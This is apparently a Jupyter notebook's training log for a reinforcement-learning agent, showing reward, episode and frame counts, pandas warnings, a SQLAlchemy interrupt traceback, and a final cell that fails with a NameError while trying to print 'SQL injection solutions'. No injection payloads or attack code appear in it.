Running reward: 0.25	 Episode 24	 Frame count: 24600
Running reward: 0.25	 Episode 24	 Frame count: 24700
Running reward: 0.25	 Episode 24	 Frame count: 24800
Running reward: 0.25	 Episode 24	 Frame count: 24900
Running reward: 0.24	 Episode 25	 Frame count: 25000
Running reward: 0.24	 Episode 25	 Frame count: 25100
Running reward: 0.24	 Episode 25	 Frame count: 25200
Running reward: 0.24	 Episode 25	 Frame count: 25300
Running reward: 0.24	 Episode 25	 Frame count: 25400
Running reward: 0.24	 Episode 25	 Frame count: 25500
Running reward: 0.24	 Episode 25	 Frame count: 25600
Running reward: 0.24	 Episode 25	 Frame count: 25700
Running reward: 0.24	 Episode 25	 Frame count: 25800
Running reward: 0.24	 Episode 25	 Frame count: 25900
Running reward: 0.23	 Episode 26	 Frame count: 26000
Running reward: 0.23	 Episode 26	 Frame count: 26100
Running reward: 0.23	 Episode 26	 Frame count: 26200
Running reward: 0.23	 Episode 26	 Frame count: 26300
Running reward: 0.23	 Episode 26	 Frame count: 26400
Running reward: 0.23	 Episode 26	 Frame count: 26500
Running reward: 0.23	 Episode 26	 Frame count: 26600
Running reward: 0.23	 Episode 26	 Frame count: 26700
Running reward: 0.23	 Episode 26	 Frame count: 26800
Running reward: 0.23	 Episode 26	 Frame count: 26900
Running reward: 0.22	 Episode 27	 Frame count: 27000
Running reward: 0.22	 Episode 27	 Frame count: 27100
Running reward: 0.22	 Episode 27	 Frame count: 27200
Running reward: 0.22	 Episode 27	 Frame count: 27300
Running reward: 0.22	 Episode 27	 Frame count: 27400
Running reward: 0.22	 Episode 27	 Frame count: 27500
Running reward: 0.22	 Episode 27	 Frame count: 27600
Running reward: 0.22	 Episode 27	 Frame count: 27700
Running reward: 0.22	 Episode 27	 Frame count: 27800
Running reward: 0.22	 Episode 27	 Frame count: 27900

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.25	 Episode 28	 Frame count: 28000
Running reward: 0.25	 Episode 28	 Frame count: 28100
Running reward: 0.25	 Episode 28	 Frame count: 28200

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.25	 Episode 28	 Frame count: 28300
Running reward: 0.25	 Episode 28	 Frame count: 28400
Running reward: 0.25	 Episode 28	 Frame count: 28500
Running reward: 0.25	 Episode 28	 Frame count: 28600
Running reward: 0.25	 Episode 28	 Frame count: 28700
Running reward: 0.25	 Episode 28	 Frame count: 28800
Running reward: 0.25	 Episode 28	 Frame count: 28900
Running reward: 0.24	 Episode 29	 Frame count: 29000
Running reward: 0.24	 Episode 29	 Frame count: 29100
Running reward: 0.24	 Episode 29	 Frame count: 29200
Running reward: 0.24	 Episode 29	 Frame count: 29300
Running reward: 0.24	 Episode 29	 Frame count: 29400

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.24	 Episode 29	 Frame count: 29500

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.24	 Episode 29	 Frame count: 29600
Running reward: 0.24	 Episode 29	 Frame count: 29700
Running reward: 0.24	 Episode 29	 Frame count: 29800
Running reward: 0.24	 Episode 29	 Frame count: 29900
Running reward: 0.23	 Episode 30	 Frame count: 30000
Running reward: 0.23	 Episode 30	 Frame count: 30100
Running reward: 0.23	 Episode 30	 Frame count: 30200
Running reward: 0.23	 Episode 30	 Frame count: 30300
Running reward: 0.23	 Episode 30	 Frame count: 30400
Running reward: 0.23	 Episode 30	 Frame count: 30500
Running reward: 0.23	 Episode 30	 Frame count: 30600
Running reward: 0.23	 Episode 30	 Frame count: 30700
Running reward: 0.23	 Episode 30	 Frame count: 30800
Running reward: 0.23	 Episode 30	 Frame count: 30900
Running reward: 0.26	 Episode 31	 Frame count: 31000
Running reward: 0.26	 Episode 31	 Frame count: 31100
Running reward: 0.26	 Episode 31	 Frame count: 31200
Running reward: 0.26	 Episode 31	 Frame count: 31300
Running reward: 0.26	 Episode 31	 Frame count: 31400
Running reward: 0.26	 Episode 31	 Frame count: 31500
Running reward: 0.26	 Episode 31	 Frame count: 31600
Running reward: 0.26	 Episode 31	 Frame count: 31700
Running reward: 0.26	 Episode 31	 Frame count: 31800
Running reward: 0.26	 Episode 31	 Frame count: 31900
Running reward: 0.28	 Episode 32	 Frame count: 32000
Running reward: 0.28	 Episode 32	 Frame count: 32100
Running reward: 0.28	 Episode 32	 Frame count: 32200
Running reward: 0.28	 Episode 32	 Frame count: 32300
Running reward: 0.28	 Episode 32	 Frame count: 32400
Running reward: 0.28	 Episode 32	 Frame count: 32500
Running reward: 0.28	 Episode 32	 Frame count: 32600
Running reward: 0.28	 Episode 32	 Frame count: 32700
Running reward: 0.28	 Episode 32	 Frame count: 32800
Running reward: 0.28	 Episode 32	 Frame count: 32900
Running reward: 0.30	 Episode 33	 Frame count: 33000
Running reward: 0.30	 Episode 33	 Frame count: 33100
Running reward: 0.30	 Episode 33	 Frame count: 33200
Running reward: 0.30	 Episode 33	 Frame count: 33300
Running reward: 0.30	 Episode 33	 Frame count: 33400
Running reward: 0.30	 Episode 33	 Frame count: 33500
Running reward: 0.30	 Episode 33	 Frame count: 33600
Running reward: 0.30	 Episode 33	 Frame count: 33700
Running reward: 0.30	 Episode 33	 Frame count: 33800
Running reward: 0.30	 Episode 33	 Frame count: 33900
Running reward: 0.29	 Episode 34	 Frame count: 34000
Running reward: 0.29	 Episode 34	 Frame count: 34100
Running reward: 0.29	 Episode 34	 Frame count: 34200

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.29	 Episode 34	 Frame count: 34300
Running reward: 0.29	 Episode 34	 Frame count: 34400
Running reward: 0.29	 Episode 34	 Frame count: 34500
Running reward: 0.29	 Episode 34	 Frame count: 34600
Running reward: 0.29	 Episode 34	 Frame count: 34700
Running reward: 0.29	 Episode 34	 Frame count: 34800
Running reward: 0.29	 Episode 34	 Frame count: 34900
Running reward: 0.31	 Episode 35	 Frame count: 35000
Running reward: 0.31	 Episode 35	 Frame count: 35100
Running reward: 0.31	 Episode 35	 Frame count: 35200
Running reward: 0.31	 Episode 35	 Frame count: 35300

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.31	 Episode 35	 Frame count: 35400

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.31	 Episode 35	 Frame count: 35500

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.31	 Episode 35	 Frame count: 35600
Running reward: 0.31	 Episode 35	 Frame count: 35700
Running reward: 0.31	 Episode 35	 Frame count: 35800
Running reward: 0.31	 Episode 35	 Frame count: 35900
Running reward: 0.31	 Episode 36	 Frame count: 36000
Running reward: 0.31	 Episode 36	 Frame count: 36100
Running reward: 0.31	 Episode 36	 Frame count: 36200
Running reward: 0.31	 Episode 36	 Frame count: 36300
Running reward: 0.31	 Episode 36	 Frame count: 36400
Running reward: 0.31	 Episode 36	 Frame count: 36500
Running reward: 0.31	 Episode 36	 Frame count: 36600
Running reward: 0.31	 Episode 36	 Frame count: 36700
Running reward: 0.31	 Episode 36	 Frame count: 36800

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.31	 Episode 36	 Frame count: 36900
Running reward: 0.30	 Episode 37	 Frame count: 37000
Running reward: 0.30	 Episode 37	 Frame count: 37100
Running reward: 0.30	 Episode 37	 Frame count: 37200
Running reward: 0.30	 Episode 37	 Frame count: 37300
Running reward: 0.30	 Episode 37	 Frame count: 37400
Running reward: 0.30	 Episode 37	 Frame count: 37500
Running reward: 0.30	 Episode 37	 Frame count: 37600
Running reward: 0.30	 Episode 37	 Frame count: 37700
Running reward: 0.30	 Episode 37	 Frame count: 37800
Running reward: 0.30	 Episode 37	 Frame count: 37900
Running reward: 0.29	 Episode 38	 Frame count: 38000
Running reward: 0.29	 Episode 38	 Frame count: 38100
Running reward: 0.29	 Episode 38	 Frame count: 38200
Running reward: 0.29	 Episode 38	 Frame count: 38300
Running reward: 0.29	 Episode 38	 Frame count: 38400

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.29	 Episode 38	 Frame count: 38500
Running reward: 0.29	 Episode 38	 Frame count: 38600
Running reward: 0.29	 Episode 38	 Frame count: 38700
Running reward: 0.29	 Episode 38	 Frame count: 38800
Running reward: 0.29	 Episode 38	 Frame count: 38900
Running reward: 0.28	 Episode 39	 Frame count: 39000
Running reward: 0.28	 Episode 39	 Frame count: 39100
Running reward: 0.28	 Episode 39	 Frame count: 39200
Running reward: 0.28	 Episode 39	 Frame count: 39300
Running reward: 0.28	 Episode 39	 Frame count: 39400
Running reward: 0.28	 Episode 39	 Frame count: 39500
Running reward: 0.28	 Episode 39	 Frame count: 39600
Running reward: 0.28	 Episode 39	 Frame count: 39700
Running reward: 0.28	 Episode 39	 Frame count: 39800
Running reward: 0.28	 Episode 39	 Frame count: 39900
Running reward: 0.30	 Episode 40	 Frame count: 40000
Running reward: 0.30	 Episode 40	 Frame count: 40100
Running reward: 0.30	 Episode 40	 Frame count: 40200
Running reward: 0.30	 Episode 40	 Frame count: 40300
Running reward: 0.30	 Episode 40	 Frame count: 40400
Running reward: 0.30	 Episode 40	 Frame count: 40500
Running reward: 0.30	 Episode 40	 Frame count: 40600
Running reward: 0.30	 Episode 40	 Frame count: 40700
Running reward: 0.30	 Episode 40	 Frame count: 40800
Running reward: 0.30	 Episode 40	 Frame count: 40900
Running reward: 0.32	 Episode 41	 Frame count: 41000
Running reward: 0.32	 Episode 41	 Frame count: 41100
Running reward: 0.32	 Episode 41	 Frame count: 41200

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.32	 Episode 41	 Frame count: 41300

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.32	 Episode 41	 Frame count: 41400
Running reward: 0.32	 Episode 41	 Frame count: 41500
Running reward: 0.32	 Episode 41	 Frame count: 41600
Running reward: 0.32	 Episode 41	 Frame count: 41700
Running reward: 0.32	 Episode 41	 Frame count: 41800
Running reward: 0.32	 Episode 41	 Frame count: 41900
Running reward: 0.33	 Episode 42	 Frame count: 42000
Running reward: 0.33	 Episode 42	 Frame count: 42100
Running reward: 0.33	 Episode 42	 Frame count: 42200
Running reward: 0.33	 Episode 42	 Frame count: 42300
Running reward: 0.33	 Episode 42	 Frame count: 42400
Running reward: 0.33	 Episode 42	 Frame count: 42500
Running reward: 0.33	 Episode 42	 Frame count: 42600

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.33	 Episode 42	 Frame count: 42700
Running reward: 0.33	 Episode 42	 Frame count: 42800
Running reward: 0.33	 Episode 42	 Frame count: 42900
Running reward: 0.33	 Episode 43	 Frame count: 43000
Running reward: 0.33	 Episode 43	 Frame count: 43100
Running reward: 0.33	 Episode 43	 Frame count: 43200
Running reward: 0.33	 Episode 43	 Frame count: 43300
Running reward: 0.33	 Episode 43	 Frame count: 43400
Running reward: 0.33	 Episode 43	 Frame count: 43500
Running reward: 0.33	 Episode 43	 Frame count: 43600

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.33	 Episode 43	 Frame count: 43700
Running reward: 0.33	 Episode 43	 Frame count: 43800
Running reward: 0.33	 Episode 43	 Frame count: 43900
Running reward: 0.32	 Episode 44	 Frame count: 44000

C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:
C:\Users\ilija\AppData\Local\Temp\ipykernel_1372\1726228144.py:22: FutureWarning: elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison
  if context['goal'] in df.values:

Running reward: 0.32	 Episode 44	 Frame count: 44100
Running reward: 0.32	 Episode 44	 Frame count: 44200
Running reward: 0.32	 Episode 44	 Frame count: 44300
Running reward: 0.32	 Episode 44	 Frame count: 44400
Running reward: 0.32	 Episode 44	 Frame count: 44500
Running reward: 0.32	 Episode 44	 Frame count: 44600
Running reward: 0.32	 Episode 44	 Frame count: 44700
Running reward: 0.32	 Episode 44	 Frame count: 44800
Running reward: 0.32	 Episode 44	 Frame count: 44900
Running reward: 0.31	 Episode 45	 Frame count: 45000
Running reward: 0.31	 Episode 45	 Frame count: 45100
Running reward: 0.31	 Episode 45	 Frame count: 45200
Running reward: 0.31	 Episode 45	 Frame count: 45300
Running reward: 0.31	 Episode 45	 Frame count: 45400
Running reward: 0.31	 Episode 45	 Frame count: 45500
Running reward: 0.31	 Episode 45	 Frame count: 45600
Running reward: 0.31	 Episode 45	 Frame count: 45700

Exception during reset or similar
Traceback (most recent call last):
  File "c:\Users\ilija\AppData\Local\Programs\Python\Python310\lib\site-packages\sqlalchemy\pool\base.py", line 739, in _finalize_fairy
    fairy._reset(pool)
  File "c:\Users\ilija\AppData\Local\Programs\Python\Python310\lib\site-packages\sqlalchemy\pool\base.py", line 988, in _reset
    pool._dialect.do_rollback(self)
  File "c:\Users\ilija\AppData\Local\Programs\Python\Python310\lib\site-packages\sqlalchemy\engine\default.py", line 682, in do_rollback
    dbapi_connection.rollback()
KeyboardInterrupt

Running reward: 0.31	 Episode 45	 Frame count: 45800
Running reward: 0.31	 Episode 45	 Frame count: 45900
Running reward: 0.30	 Episode 46	 Frame count: 46000
Running reward: 0.30	 Episode 46	 Frame count: 46100
Running reward: 0.30	 Episode 46	 Frame count: 46200
Running reward: 0.30	 Episode 46	 Frame count: 46300
Running reward: 0.30	 Episode 46	 Frame count: 46400
Running reward: 0.30	 Episode 46	 Frame count: 46500
Running reward: 0.30	 Episode 46	 Frame count: 46600
Running reward: 0.30	 Episode 46	 Frame count: 46700

In [1]:
print('Successful SQL injection solutions:')
for episode_solution in solutions:
    print([payloads[i] for i in episode_solution])

Successful SQL injection solutions:

NameError: name 'solutions' is not defined